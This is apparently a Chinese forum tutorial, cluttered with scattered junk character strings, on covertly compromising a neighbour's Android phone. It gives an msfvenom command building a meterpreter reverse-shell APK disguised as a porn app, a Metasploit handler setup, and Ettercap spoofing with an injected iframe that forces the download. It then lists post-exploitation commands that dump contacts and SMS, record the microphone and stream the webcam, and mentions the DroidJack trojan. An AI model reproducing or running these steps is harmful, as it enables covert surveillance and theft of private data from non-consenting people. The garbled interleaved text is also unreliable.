% _3 K6 i# B) s* P 五、msf+ettercap入侵邻居安卓手机 ; v m+ X0 ?- H. R) m
2 m9 D+ l( P$ S( w0 Z4 t! ^& [! l6 \4 V. j" z! c: X, h
首先启动msf . i7 E; M% o! N2 \& G5 K
' z0 K( {; T& K) S( P. ?8 }" z6 c7 c; b6 F
先用kali生成一个安卓木马,如下命令:
" g6 P, w# f! h4 ] & q" I. {* g/ W" L9 H8 P) Y7 _
' [, c4 o; Z. ?; d0 l; s5 E# [ Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
% d1 Y- R. Z( w ( \7 k* U" D6 E; ]* L) A- @% ^
4 K3 w- ]) w/ L" v1 l1 y
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
9 u# z3 \- q" Z & _, l; x/ m! X9 x0 j+ t
/ C( l* g1 N) d; p' y 然后进入msf , C/ s9 E' `4 M3 q( |- f
$ |" a7 ]: T6 s4 ~$ c: O. p P( y' L5 D
use exploit/multi/handler
3 B' ?; \6 o+ E 6 O4 ]- l$ ]* Y1 M7 o
% D% S7 T/ i% ?- J; n set payload android/meterpreter/reverse_tcp
; h( G8 w% z2 R2 L2 P4 e . M5 S+ W, k5 y0 i
\- l! B4 r) r
set LHOST 192.168.0.109 //ip为kaili的ip
3 |5 d! m& u ^ 3 U. b2 N: H- I! T+ t. J
+ @, G/ E+ u# u2 b/ X& J
set LPORT 44444 //端口一定要与前面生成的木马的端口一致 + }1 L2 A0 w3 k" R* Q6 p
& Z, ~. g9 j5 P) w' n# p2 m0 V. Z& h' E! u8 I1 w m* W( x
Exploit & } F: ~! A5 z/ w' J9 Z; h; b
; v/ g1 Q4 i0 |& d5 O
6 |1 m: N4 ]' R/ C: E" M 3 ~4 @* M" @! a4 r; }+ P
3 x' }& g/ N9 F$ E! p* g
' Q3 }. X- ]7 E9 ]! ] 下面我们开启ettercap -G
. H9 \) h s) ^ # `; {6 I; _' \# o9 H# ?
`3 g/ J5 c' m. B$ g 我物理IP为 8 `( X: X- C+ t T
# C9 X8 D" O5 B% E0 M6 R* F0 c. | t$ H% C1 L
: Z& u: W- @3 i+ b- m# R# @
3 I+ B% I" H9 J% }/ `8 t0 ~/ n( @) {& { }1 \% E; h
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 8 M( k7 _. B# U% J' z) {8 b0 U
$ _7 Y& w( [ Q B1 Z+ i& [$ r! @( T# s) |
下面我们来设置一下
+ w2 c' b) Y. B( B3 g 6 m0 V) a; d4 M9 u( J) G* X1 S4 J* r
4 Y- s2 E9 R. ]$ u7 t1 _
9 n3 Z/ S; X. l$ P" A) C1 }; O ( k4 e: r% v* B
7 M, L& m$ y Q {% c& M: i6 H 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, & u- f1 l8 V' y% J- v
7 x( m* C5 ~/ p0 i1 Q) b
# j+ H4 {- z/ { R5 h; n6 m, f
[, m; a7 Q- _* @) X, r % a9 Y2 C+ D$ r3 g4 Z
7 V ?$ J, C) T5 W7 @, k& f: V
5 b# Y0 S. R& |( w7 o
8 v5 {7 I. v$ o/ B
3 Z8 r& W$ }2 c7 d6 m* N 5 d5 C4 x! v" |# Z: h1 R0 O
! w. ^, A) @0 D) B) ^* y: Z
& @" ^ D: \- z- Q1 ^+ l
# v6 E/ [! T6 g" J
" I [! V6 ]7 B2 H$ o! z3 I
4 x. e7 K: r: U! } 7 _) G- v p& i1 a5 d
6 d, L" L/ @$ s+ [+ J: i7 z$ x Y2 ^
+ A- K6 z+ `% n/ ^. `+ U' _
3 C& {+ ~: n1 ]% n- A
5 n3 R! g, y! @5 _
4 L; D+ j c4 k: d' `: k
5 h, p @. P( H9 X& P" U- T
5 J4 s9 y: D m9 U6 |* R' W
& N# J) \- U% B* d+ Y# J/ s$ [ / M; r- t0 S; x8 j; j, \
( k8 B* C/ i0 ~+ T8 }5 ?- S
$ f1 M" n0 G* Z: m; B" }. c9 w
0 s- w$ Q2 m/ o- n " A! b1 q" g; V4 B( G
/ G* f* j6 l% {- |6 a ! c2 T6 W" L, [9 N- o4 \8 j1 ~2 R
0 ]+ b0 ~3 O3 z, w
M7 J% m. U2 W4 K5 o- I- J$ s; T 5 b/ P9 ?8 r4 @3 z
- E( z* F4 U! X. _
0 x# E+ a3 S- \9 W" P: l
* B$ D! Y f- _5 } 0 W: t$ c+ }( E4 W/ @" z' |' y& ?
, L5 O* |1 L' y H! N
c5 f" G, B/ Y, l 1 q1 n1 p. {& m5 W
6 p0 d$ u# r I; g; b9 i8 [
下面我们开始攻击
7 G! S, [+ m4 h$ t. F" N
7 n+ q2 b4 U% A; G5 n1 W7 @) r( ~+ T& o' Z& A( _3 @6 _1 o& O! r! B
0 E; P8 j$ j$ z2 T! k
1 S9 o3 K( d9 h' \: o& U' _
# l* f6 o6 Y4 z 8 e3 q0 D6 {0 J/ @
2 ?2 @% S3 L" S- [5 ?3 A1 ^* p
: C& w4 E+ m) d9 k, \
: b! S. v9 c; L- T2 F a1 L2 ^ 5 m V9 |6 Y# Q9 P/ l. k# E
( }+ A* o) e$ _3 ~& w 6 g w6 R0 { ?! [* T, Y+ r& y
; X( M8 w: [* z4 y, v/ e. h0 f9 ~
* G8 W) U# m+ S" c u9 }2 a9 v
$ q+ d7 ^% A# O, T( l, F5 g3 y3 m/ C: O3 n1 I {5 Q
大概过了5分钟多,发现反弹成功了 . R$ @0 W3 A" \
: y! p' e8 Z: H4 }! n9 K8 |
' Z/ y* O) s7 `9 X. U ) Y% f% [. n8 t6 ^/ G) O
2 [) o- j4 {* l- o* }( j
4 @ H6 }( C' s; Z- [ & k% O' ~$ S7 ?$ z# o/ }. S
" {* M1 A* m5 _0 c9 @& d
3 b6 ^" l# y# e) p0 n& n
0 A; e4 M9 ^* t
) n9 m4 l2 d2 a u
Y9 X- {+ }3 b7 y! D/ x 9 S0 v* }" W5 w, G5 a8 \6 ~
& J: z& b% `0 U: ], L# Q! j% Z5 I3 v! B. b; h+ l D8 `0 X" N
, |8 D8 f9 C# o9 E3 n8 V
7 X+ q$ x2 R y5 @# i0 F; F
" ^/ k) Z( x" U* ]+ @
2 s8 ~1 V5 O0 @8 `& i + ~" k/ R2 F: d/ ]- f; d: I; g
" d# g2 W- q1 r2 F q
5 J( B9 D# A0 R/ W8 E
+ v) u7 c! j1 }) Q" V. t' C
6 T L2 l: e) e$ ~& \; e 执行命令
/ M* }) ?% C8 O- f# b/ Q4 M
, g7 R' V5 A9 }* w! N8 s' g
( e8 [$ [6 j5 v. A: u' L
, C' x: @1 L' a- ? 5 e7 k, P1 C+ E+ w( V. ~ f
; l! m7 Z4 W( m& n, K6 b, `1 U dump_contacts --》这个是导出电话 9 Z- \* ]# d, D7 f0 d
1 n- s' C( z: n' n5 Q! A
$ s( @2 u" O0 z, t# u
dump_sms --》这个是导出信息
, t3 W3 ?6 |* |4 p
! R! ]* Z, h0 @: R1 X
. ]* h4 d& Q$ P: R6 q6 P9 Q record_mic Record audio from the default microphone for X seconds
, L- h! e* G1 M, ~( w7 S
. B" N" Q i( V0 w5 w6 S6 {
, ]' ~5 B# @4 C8 g5 K webcam_chat Start a video chat D4 ?" A- S L7 d& G; i% g4 [
. N. O& K8 \) p( n
+ J' _7 c; t, C1 J2 h; k webcam_list List webcams * B9 K. d) A, k7 o! I2 H8 o( b
0 S% t. W7 [- Z. r; v8 q% Q" L) ] h4 Q8 Y, |: s
webcam_snap Take a snapshot from the specified webcam 5 Z# Y; |7 E# |0 ^% G
$ m0 d( v s+ A' }8 \% V' _9 j7 r) w v3 Q
webcam_stream  lay a video stream from the specified webcam
; m8 r* T; v" O
6 l3 C8 `0 z* F0 G+ v, ` _8 u: |" b3 q& E. I1 n2 {- g% m
8 z" D% o, ?9 e7 M) T' B
7 x, X$ n, n, \6 k, e0 [! k) H6 g# f, w2 g; b' S! @
2 x% ]) `; i( T5 \1 o+ w : J& D& t8 o! d
$ b! E; U- p4 b3 p, h" W 我们打开看一下电话薄,
* d! T1 |& Q4 g# W% ^2 { - C1 H. X7 [% s8 w6 |) m2 T
7 \4 A: c# t# C j- h( V
/ U# j' H4 U2 v, e) A3 F
- J6 Y( I6 k2 l, Q$ O0 U3 U+ B9 \: i0 B/ W9 x( {
. [+ I" b' r' K8 I+ t$ X
4 @0 {/ N% p/ {0 s& Z& y' g$ A4 L+ }8 |! K# l1 y
1 ~5 F/ F( _. B' U4 D* f
2 j$ K- `6 I5 z8 B/ [. f
9 V8 t, {) q# h* a E
; K( L/ |. N# y. q 0 f$ e: U1 H x8 L" `5 J5 M9 L* v
- d8 D+ z! i" l7 T0 {7 H7 |' |
( w: _7 c2 r5 f% P 4 @# e1 v; u/ @& Y( k. |
* A* r' C6 r6 i2 E
; |# o& w2 @ }. O# i
, h& Y% v# V3 G6 o( v) d0 E
) U' \* d v- a: V- [ {/ D+ {) V& G 我们同时欺骗成DroidJack木马,使用方法如图: 2 t8 l& t' ?- o
8 H: A7 a5 T" G8 O) @) X" ^- u% Q9 H) {" j% n7 T \
' w: d7 u* x. i4 m3 T* G" b. J
* N* E# Y; D+ d! p* A- L
- E( k1 s# G( a* Z
# m. {' G: E9 e" ]0 w/ ?
0 |. H! h+ i# ]* R
8 z8 K, E* |8 f/ J% T7 O+ E$ t m 9 \3 V% z+ M; A1 C3 S& h) @! [% V
. G# \7 J% K, @, }3 m! ]( [6 y5 t9 Q6 ] B1 J* v$ N, I
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
3 b1 k: D$ H+ y0 W$ e3 p. o4 R
6 A1 c8 g% @: ^" N( s4 q L. q( x* W! g0 `7 V
, \" M4 i; U) J& R" H5 x+ r! T$ l
% H, [5 y7 @! J8 `+ C2 f& B
; N+ X4 ^9 V: B0 w3 k 5 V x) r* v7 X% L. ^9 s
" Y! J5 X5 x; x- m
7 \$ F6 J4 J2 J# @# x: N
1 F* r! o0 A( G5 B8 }6 T( P
9 u. n. }5 w3 o; Z, U4 U
* L* T8 C0 }$ @( Q( I# r
' }5 Z6 D7 w4 N+ f: C" u/ Z 1 [1 i. n0 i* |. u" w! f" H
V$ b! m: Z& D- s4 f! d 2 z$ B1 O Q; N! H
|